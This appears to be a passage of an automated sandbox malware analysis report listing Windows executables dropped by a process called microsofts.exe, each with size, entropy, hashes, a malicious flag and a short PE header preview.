                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..................p.........@.............................p.......<.... .........................................2...........d....`..8....P..........................8......................(.......@...............X...(........................text...4........................... ..`.rdata..|...........................@..@.data................r..............@....pdata.......P.......n..............@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne..... ...........................tls.........0.......0..............@..._RDATA..\....@.......2..............@..@malloc_h.....P.......4.............. ..`.rsrc...8....`.......6..............@..@.reloc.......p.......B..............@...........................................................................................................................................
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1801216
                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.166362544488334
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:WwNHwoYhua6MtjRO4qbBJTY6mY1uIgssqjnhMgeiCl7G0nehbGZpbD:WwNPdQO7BJTfmEnDmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:FDF7D8F9FEA566707E69A739603FE6CB
                                                                                                                                                                                                                                                                                                          SHA1:A5E40D0C02CAAF6AFB3DA31C1BB752A821512DA3
                                                                                                                                                                                                                                                                                                          SHA-256:0217435470F9F0B9F62978427BED480B0504A0B7959D28011B4FCD2D8996A597
                                                                                                                                                                                                                                                                                                          SHA-512:CA4583CAE8E08CD15F426F90BF8FC2AA939A2291FED877EBDEBF8F75BEB0D4E7663E5E9C79BA749EE9410E839A0CC970CF2E3EB819C02497B5849AE72F92F896
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......*...r......P..........@.......................................... .........................................C...........................T.......................T.......................(....R..@............"..8.......`....................text....(.......*.................. ..`.rdata.......@......................@..@.data...@...........................@....pdata..T...........................@..@.00cfg..0....@.......N..............@..@.gxfg....,...P...,...P..............@..@.retplne.............|...................tls.................~..............@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...........................................................................................................................................
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1325568
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.141851019985087
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:j4lbht6BH/sqjnhMgeiCl7G0nehbGZpbD:ElNtqHjDmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:F962054709806711163D11A7B5E254F0
                                                                                                                                                                                                                                                                                                          SHA1:230C44D1C63F590C000AAA782CCCBDEBB73D440A
                                                                                                                                                                                                                                                                                                          SHA-256:DD8867BEFD878FB45CA4AD6BF1516CA46F18C8AA1609812C1D1C4B217DE9F273
                                                                                                                                                                                                                                                                                                          SHA-512:7C9B07C0BFBB272C918A2DDE43E6AAF3D7424CD491D1F0FC95F4FA8699D8276E5127C32B165924B816B498A0FFE5304A9BAC8B3351AD10F083F75058F84B41C9
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o.y.+c..+c..+c..?...!c..?....c..?...9c..I...:c..I...8c..I....c..?...*c..?....c..+c..Xc......)c.....*c..+c..|c......*c..Rich+c..........................PE..L...B(.d.................^..........@........p....@.................................o`......................................H...<........q..........................pu..p...........................X...@...............@....k..`....................text...`\.......^.................. ..`.data........p.......b..............@....idata...............l..............@..@.didat...............v..............@....rsrc....q.......r...x..............@..@.reloc...`...0...P..................@...........................................................................................................................................................................................................................................

Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1221120
Entropy (8bit): 5.138852923387598
Encrypted: false
SSDEEP: 12288:gIkOkTB+wjXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:gIxkTBVjsqjnhMgeiCl7G0nehbGZpbD
MD5: 25BCF757F471B196A97D63CE9BD8DF3D
SHA1: BC46811AEE7A50FFE96BEE94840DFBB675640F47
SHA-256: 8032D6B0A5A0EBC923539BC401B6F14B5F120AACDA4CC81ACFD6F09C6A5FFE47
SHA-512: 358DFE045039300A90AD601A0AE46414AC1593F14CD05532083431C1201F2448EF8269AF69AE67276E1349409B9AB6BD9300C958508BA8426AA3C30CD4B35D46
Malicious: true
Reputation: unknown

Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1335296
Entropy (8bit): 5.236772350787977
Encrypted: false
SSDEEP: 12288:44lssmroCEXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:4cssmrmsqjnhMgeiCl7G0nehbGZpbD
MD5: C43F5DBE6EEB54B201DADC1606FF4D49
SHA1: 82ABDA73D6E90F7DE69A630F58A6EA56676ED051
SHA-256: A45088AD652D9D1514C22805ECE6CE1573EB169D35BF804BC75DEB7ABC2D048D
SHA-512: 2E86528D85E156D903AA5537988BD770EB101AFC3D7747E45BFEB4487D8B1F5E295AD2B7C844ADC9FB415C1D0B0CA8A5AF8C8E914D37A3B100BDFBE35E098EBF
Malicious: true
Reputation: unknown

Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1383936
Entropy (8bit): 5.338515999042273
Encrypted: false
SSDEEP: 24576:M03cT++foSBWU2YxhkghsqjnhMgeiCl7G0nehbGZpbD:z3cK+foQWU2YnP1Dmg27RnWGj
MD5: 06F6A2E6C033F0F21544AABD541C7932
SHA1: 4026D5C703F47E1BF012FB0805CE027943928FC2
SHA-256: 7F8EBA756D4B29A71BBA0B471A22F4DFB75EFBBB754A0EA309939AB5407FEE12
SHA-512: 5B7B49CCF34CC9219BEBEB01FA3E47B6BDD43E1944081C146DE5F71FB8506F7FE3BABACFE2BAA199153732B2E53FF49637360AD5F2285E0BB3D0495DFA8E1366
Malicious: true
Reputation: unknown

Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1221120
Entropy (8bit): 5.138903608870187
Encrypted: false
SSDEEP: 12288:AbrNRzB+NBXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:AbBRzBgBsqjnhMgeiCl7G0nehbGZpbD
MD5: 3C6E1AAC1F4FD2D770AECF7E4CDEB762
SHA1: 30AA11E72788ADFE824C7DF5114ABA45D14FF4F1
SHA-256: 337572D34B42004D1573F1D3E0EF4CC44E47CB630F88E5455AC675F980F81337
SHA-512: 9D849E32FC885B609A70A56EBC1414B90EC582F7FD1C271F57F1FEABED63FFD6ABEC0066FB98C4B3996E8AE2AAC79F16D7E18E19395E684579FA76AF2435DEDD
Malicious: true
Reputation: unknown

Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 2168832
Entropy (8bit): 7.9405585532876115
Encrypted: false
SSDEEP: 49152:Ry53w24gQu3TPZ2psFkiSqwozPDmg27RnWGj:RyFQgZqsFki+ozPD527BWG
MD5: EE6A56397AD5B0A6268AEC6254684661
SHA1: 061AA33E822172992288A3189D92761F3E79B37E
SHA-256: D6868A1EB9C78C6F71B0DFE929658CD486547540528A38AAF1D07D1FF9C06E16
SHA-512: A72090FEB4980C830A9C51C365DCC17C496D9110CAA612055498248328B40032CE1088DB68BB5B7F3CFEEC37BAD46036E8545B2A7EBD62B2C965B078B6699DC9
Malicious: true
Reputation: unknown

Process: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 3141
Entropy (8bit): 4.803308829924924
Encrypted: false
SSDEEP: 48:KCVnAJrzKnRUgQ/gmny6nknEKgBEI1+gkgJGMEgqwCGzKzERNgn46gD:WCr7Ymg
MD5: 7B46F50682B48D2CE6B62F301E4772B5
SHA1: 8E90A920A18BCA496739FA89600D86BC1C99AED7
SHA-256: 875F8D8AE1D3C5EAEBC3BD74D05A97A990AB573ABEF857BB4A1761CBCF1BF53D
SHA-512: 94474B6997123B14F472198147072711099D344D9C3FC30BCE7CD501E8FB3960CD5A29FA96E537578859A5A8F5F03F007599B8225EF4EF92118214A6F0FE0E81
Malicious: false
Reputation: unknown
Preview (CRLF line terminators restored):
  2024-10-10 04:07:34-0400: Disabled unneeded token privilege: SeAssignPrimaryTokenPrivilege.
  2024-10-10 04:07:34-0400: Disabled unneeded token privilege: SeAuditPrivilege.
  2024-10-10 04:07:34-0400: Disabled unneeded token privilege: SeBackupPrivilege.
  2024-10-10 04:07:34-0400: Disabled unneeded token privilege: SeCreateGlobalPrivilege.
  2024-10-10 04:07:34-0400: Disabled unneeded token privilege: SeCreatePagefilePrivilege.
  2024-10-10 04:07:34-0400: Disabled unneeded token privilege: SeCreatePermanentPrivilege.
  2024-10-10 04:07:34-0400: Disabled unneeded token privilege: SeCreateSymbolicLinkPrivilege.
  2024-10-10 04:07:34-0400: Could not disable token privilege value: SeCreateTokenPrivilege. (1300)
  2024-10-10 04:07:34-0400: Disabled unneeded token privilege: SeDebugPrivilege.
  2024-10-10 04:07:34-0400: Could not disable token privilege value: SeEnableDelegationPrivilege. (1300)
  2024-10-10 04:07:34-0400: Disabled unneeded token privilege: SeImpersonatePrivilege.
  2024-10-10 04:07:3
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1356800
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.3478268186599065
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:eQVTZu0JqsqjnhMgeiCl7G0nehbGZpbD:FVTZuLDmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:F20BF005553AB1557724E26FBFDB22C5
                                                                                                                                                                                                                                                                                                          SHA1:998624B191810621E2DC9E261F480A5A742B6690
                                                                                                                                                                                                                                                                                                          SHA-256:B65D19716D64C4E5DCD9B4A35F036E4ADB0169BFD579D01A7FA405CA3CD26DD5
                                                                                                                                                                                                                                                                                                          SHA-512:38579CB90638BF84249FE67DBF721E9D6F1CFE552D81E1FDCB03B0FE04750F6EDDD9CC285E6E2206CB222CD4CA641B488A1193456C9940CEAB1F5FFC36513AB2
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......R...$.................@.............................P.......^.... .................................................h&..................`....................$..........................(....p..8............,...............................text...FQ.......R.................. ..`.rdata.......p.......V..............@..@.data...4#...`.......<..............@....pdata..`............J..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl.*............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc...P.......@...t..............@...........................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1683968
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.623113736888856
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:i+gkESfh4CoZsqjnhMgeiCl7G0nehbGZpbD:ngkE+SPDmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:D77B1D9F972D861A54BCCA414035C1BF
                                                                                                                                                                                                                                                                                                          SHA1:F043114C651956FDC125BF4CD381944D8278366C
                                                                                                                                                                                                                                                                                                          SHA-256:985014C888AEC6454BB6511348E6D083FD11F4964A8DF46A0CC4A63C06437714
                                                                                                                                                                                                                                                                                                          SHA-512:2439D5D09EFCFE035F89ED92D0BEE9B0F80E01D9A565C1A820CF15DB2891E6F959E55E4442DF5C72D8526CD26A669A41D22721625CC336D734104F910ADB469C
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............xaX.xaX.xaX...X.xaX...X.xaX.x`XlxaX...X.xaX..eY.xaX...X.xaX`.bY.xaX...X.xaX...X.xaXRich.xaX........................PE..d....\.d.........."...........................@.............................. ............ .....................................................x............@...q......................................................................0............................text...v........................... ..`.rdata..T...........................@..@.data....-..........................@....pdata...q...@...r..................@..@.rsrc................j..............@..@.reloc...P.......@...r..............@...........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1532416
                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.09664585512176
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:6BpDRmi78gkPXlyo0GtjrSsqjnhMgeiCl7G0nehbGZpbD:eNRmi78gkPX4o0GtjSDmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:8CF94AAB17B2A2FA8CF140DC5E5DB5B3
                                                                                                                                                                                                                                                                                                          SHA1:7CA081F8B34536A48517296F1379D136D9922846
                                                                                                                                                                                                                                                                                                          SHA-256:C7C7EACCA5AEB6D09A286CBD3B7F840EBE57A04B41BD07185E145EE72BF4062E
                                                                                                                                                                                                                                                                                                          SHA-512:1F4552BFC2EB0925D1DF5809B02BFB0EDC1544B4B1420F3CD40A5B21434E68856DC03C4917AF3EF0FFFB255689D5FB9C6157C370DCCCF6358A263048241E223F
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........\..2..2..2.0.\..2..I..2..3..2..O..2..\.D.2...6..2.._..2..N..2..J..2.Rich.2.........................PE..d....\.d.........."......b...8......Pi........@.....................................o..... .................................................P................... .......................................................................(.......@....................text....a.......b.................. ..`.rdata...i.......j...f..............@..@.data...............................@....pdata.. ...........................@..@.rsrc...............................@..@.reloc...............r..............@...........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1282048
                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.229045441722522
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:7LOS2oTPIXVZsqjnhMgeiCl7G0nehbGZpbD:l/TKDmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:4A55B6E3A0DD0166419D4D5AB5EFA282
                                                                                                                                                                                                                                                                                                          SHA1:E3A97C40855782036437FE0C887DC7930D434BEA
                                                                                                                                                                                                                                                                                                          SHA-256:776F62B0F6899F7AE38323F51D6715DBCF420641F7B1F4D74B93E825D1B13E27
                                                                                                                                                                                                                                                                                                          SHA-512:56E74467D1036B6B73E2208DEE3AC4290646990070CB24882020FFF43312432734A3A6ED41187BA770CA110F75C95A11C37731EEC82156DEBE413502F863DB8B
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;.VS.y8..y8..y8...C.jy8..y9..y8...E.}y8...V..y8.i.<.~y8...U.ky8...;.~y8...D.~y8...@.~y8.Rich.y8.........PE..d....\.d.........."......&..........."........@.....................................mk.... ..............................................................d...........................................................................@...............................text...4$.......&.................. ..`.rdata..Ts...@...t...*..............@..@.data...83..........................@....pdata..............................@..@.rsrc....d.......f...:..............@..@.reloc..............................@...........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1145344
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.031182893421668
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:J17Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:J17sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:39F4BEF96F519F215E62526053C5DBE6
                                                                                                                                                                                                                                                                                                          SHA1:D12B7AB8FE84BFCB4C54295834A7797657B5800D
                                                                                                                                                                                                                                                                                                          SHA-256:82FA068DE4A93E6F9013BF175BC98208B0F03508FA3684FE14BE83D78E65CD41
                                                                                                                                                                                                                                                                                                          SHA-512:0DAD5C5B9809FD414AE28215564FE5EC85CCFD84FB3CC52A28DE9A84EA4D8A4AE1A8860D60AC326F9F2C2D74AA4708925CF24015E1908552FE6722E0A68C8C87
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../..........@......f!.......0....@.........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc....`...`...P...*..............@...........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1222656
Entropy (8bit):6.712012542569059
Encrypted:false
SSDEEP:12288:VRudzcXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:VAdzcsqjnhMgeiCl7G0nehbGZpbD
MD5:DEDDA34A17DDB513BA60E9A5E58E8DCF
SHA1:A3FE24606A6D216B4E53BA1457661FEFD9C042CD
SHA-256:94CB20B19C95A711907BD90FAF0B4F61AB3B1DD584A1EA4BCB6EAA0E97A00CAB
SHA-512:8170114DCC14CD5FD07BC2FBB543F141DECF07E7141933902A2D81BC268A833174A8A92B9EA7582AB9A312DFDC44E0505B5D5D349355D60E6541CA21BF6CDD5C
Malicious:true
Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1457664
Entropy (8bit):5.0821485374162405
Encrypted:false
SSDEEP:12288:lvgXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:qsqjnhMgeiCl7G0nehbGZpbD
MD5:9C3EF058A365CE9926EE22ED381AF322
SHA1:128DE86279A01FB23909807BECD1D87DBC98C222
SHA-256:547C99E68402AA3B41AF41FFFD93A31F84EB8334C9BC82940EA71B5B400E927C
SHA-512:BB2BBA1DB35DCFAAD178EC7031816DBB7960CAB2F83E243E1707606727000CF4D804FA95F7BB8E619DCB27E5B8E1917E69A00055F57F1D5FE8F673B72A51F9AA
Malicious:true
Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1461248
Entropy (8bit):5.468593725891598
Encrypted:false
SSDEEP:24576:Y5zhM1XSElsqjnhMgeiCl7G0nehbGZpbD:mMsIDmg27RnWGj
MD5:5B5E6C3BC110B7387F4B3B52B4BB6BDC
SHA1:291E6BA40542182F6369783FC252EEB2AD3EDCF1
SHA-256:CE11D27A541C37EECF465AFF17C6EB220365B03EAB5DDB07139AD182E8B98D6C
SHA-512:B592E335C854AF7118D19583051A56C26BE9FB5E99D108422EEBB6E9524CC4D7F123023D084D10818C6AD2F007E5A510EB99F3620F1AFEE2BFED3AF6CAD39A95
Malicious:true
Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):4151808
Entropy (8bit):6.499772328236918
Encrypted:false
SSDEEP:49152:JtuUC0nNc/RcYHCY9AWWnURqdHIEogMAYrukdUmSC+bXMZQU1QqpN755eDmg27RN:JjEIa4HIEWOc5ED527BWG
MD5:545280FAA06EC53D8449B5BCB9C7C430
SHA1:79A3BDBCDC596527F7A12F8029181A03D8ABDEBE
SHA-256:A2BCFE7AA3CD37CFAA98BC21854A1D2B21D05F92DA48E5168710301F8E668EF8
SHA-512:21A7F2AFFF5B8D5F4F6EA84C740149B937F3659CE8F89F6F86CC42E0006E73450316327B1916998AF0A324E58BAA5094D16C7895C650FCA4DA8E79041327E7CD
Malicious:true
Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):59941376
Entropy (8bit):7.999367294634748
Encrypted:true
SSDEEP:1572864:xQb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:iXhwMhe6AABPiQwF6xQ22R
MD5:9B6FD190F8986AB6F8D5CBE2AFD95498
SHA1:1063687A3239172BD377D9335FC65A983CB9B79B
SHA-256:F9AB22D94632551A580814C3E169D96D14A1FD8B6A4D9BE12B4F4C7FBC235271
SHA-512:5478FF047BCC317DDEF9766B01D1BF96DA96AEF0FF6B2BBD204876237DE5CD546F07D0F67D77DC1152C12B8E9FD3622254901931EA257394B690211A39233D1D
Malicious:true
Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1180160
Entropy (8bit):5.084791068707341
Encrypted:false
SSDEEP:12288:mWwXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:m1sqjnhMgeiCl7G0nehbGZpbD
MD5:C096A5FBF9703540E7BC10E3E278CD21
SHA1:21FD802336D967062BD04EA410DA4A6007EC9740
SHA-256:C8E5B55371C0F381BC1B0B26036D747A9CEBA0BD15C589A96D72C246E088F530
SHA-512:AAB69B86B301DDC908147EC357383863D15EBFD3BF9AA92CCA75BAC6E003928C0B29461A5BD764B96B7505FD11B511CD5170FCB41291A24AFDFA4B3EF6E5F6B9
Malicious:true
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):6210048
Entropy (8bit):6.386701431865539
Encrypted:false
SSDEEP:49152:jDvZEaFVUn+Dpasot2xQevgjCGT7lmPIionqOgBhGl6zVLkVEk3yV07U24GEQTXs:MnN9KfxLk6GEQTX5UKzNDHD527BWG
MD5:51976ED4A3DA997522F1BB3A5682BA30
SHA1:01B66F5E5713F0DF3F7B8B1FAF049570D48BED18
SHA-256:FA06333A9A9A0AA91CF731730A83426531DD661E68CB3D861C4C9F941BEF8638
SHA-512:45025248936BD25A7AF7D38BBE4971DB4D6F12A6A1D58FDE6C4F1CBEB503A806BBFC846A46ECB3B6B0F04DEF5E8BEEBA2D0D646DD765E9F181890242FB30DEF4
Malicious:true
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1157120
Entropy (8bit):5.041470905994349
Encrypted:false
SSDEEP:12288:a9Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:a9sqjnhMgeiCl7G0nehbGZpbD
MD5:04F6C57E32D32F73F17B56D7711EC64B
SHA1:7E76D96C6D98BD8062644CD18C8E6EC1BF5427E2
SHA-256:E3BEA8AE75C755A8D40F18BC36921A77D2530E76AA81C0CD019C3F216B45DD8E
SHA-512:609F93167EE5FFD79BFCA99E7BBECD67844C39C594203FF73CDD5C7A080B3EED31DEFC25F05C720414EE466B91909AC3724C962D824024812773DEA14E65338F
Malicious:true
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):12039168
Entropy (8bit):6.596674583007492
Encrypted:false
SSDEEP:98304:db+MzPstUEHInwZk3RBk9DdhgJCudq1uVIyESYgKuD527BWG:hnPgTHIwZoRBk9DdhSUEVIXgKuVQBWG
MD5:FA782E77322F0DAC17C058D191A33070
SHA1:B3C68E535385F7889CFEBAA5C77BD182B47B84A5
SHA-256:CF2A4418E83BA6A7FFA8637CE383588755701AA0B6549B8D76FAC57CFE3E7CA8
SHA-512:1FF95D53823E4EA31112DEAAF07EB18E00B58CC66C96D9B7E007BC632884E977B74DE8092D44D00D2CBC3EE47245BB461EB10A052FA304FE2CA1A4CF94258E42
Malicious:true
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1322496
Entropy (8bit):5.281802330367829
Encrypted:false
SSDEEP:24576:4g5FvCPusKsqjnhMgeiCl7G0nehbGZpbD:dftNDmg27RnWGj
MD5:E3DD6994142C17EE4793655E734CA489
SHA1:A4A6B99DA04C63E04398B437E8BD596EF8C6F929
SHA-256:06EB648200B8B2E765285284E6A0C8CB524F24E21202555D12E10551C27A0692
SHA-512:61DD6A2876FE51BF6EDD98E1FAE34DD13C7ED0A22DF897ABA814FF658BF627074FFD7CF08F033401FE3D8017DFFCDD3900BC38CEDFDB6AD08F991220EA3722D0
Malicious:true
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1339904
Entropy (8bit):7.2088716072922665
Encrypted:false
SSDEEP:24576:pjKTIsAjFuvtIfmFthMaT5U8aChaeu0sqjnhMgeiCl7G0nehbGZpbD:pjIMmPh7TT791Dmg27RnWGj
MD5:B49E587387E3A84064ADDABEFA6D4972
SHA1:917376F9B55AC7CF8AD9356E4A51E93D3DFA3B0B
SHA-256:185C790B6AF15BC16532D9301C930D39E7DAB1B775B711006FE75BB7E1CBD855
SHA-512:F945E127B6A4424AB14E9FD3814FA5968936825B530888F360D9D10216B88DB8DD853E78EF0C3D61C2BE2C42548E142FA1C4E6BE89F1EFC48E6DC5FEEA1F8F39
Malicious:true
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1515520
Entropy (8bit):5.411742669213158
Encrypted:false
SSDEEP:24576:RGqVwCto1Gm5WgAsqjnhMgeiCl7G0nehbGZpbD:wZ1GmUXDmg27RnWGj
MD5:5BAA3CD13531CC8BEF5FB3993822BD82
SHA1:4C33F60002335F0F840D1E647693D89BC0842011
SHA-256:38287BF82F304B564116C1D5D9F9F941AEB9720E270162900EB8C7542F9AF6D2
SHA-512:6079F5E0293CF7368555B637F6500EE3061DDC4C94D636465D54BA3F074F942C52E7D3B829ACBF52A3901F2CBB11571660A3B7802FBB19061D8871494510A707
Malicious:true
Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................v......................................a..X.....X........r....X.....Rich...........PE..d......c.........."............................@.......................................... .................................................. ...........v..............................p.......................(....................0...............................text............................... ..`.rdata..Z$...0...&..................@..@.data...x"...`.......@..............@....pdata...............L..............@..@.rsrc....v.......v...j..............@..@.reloc...P...0...@..................@...................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1253376
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.157390392810802
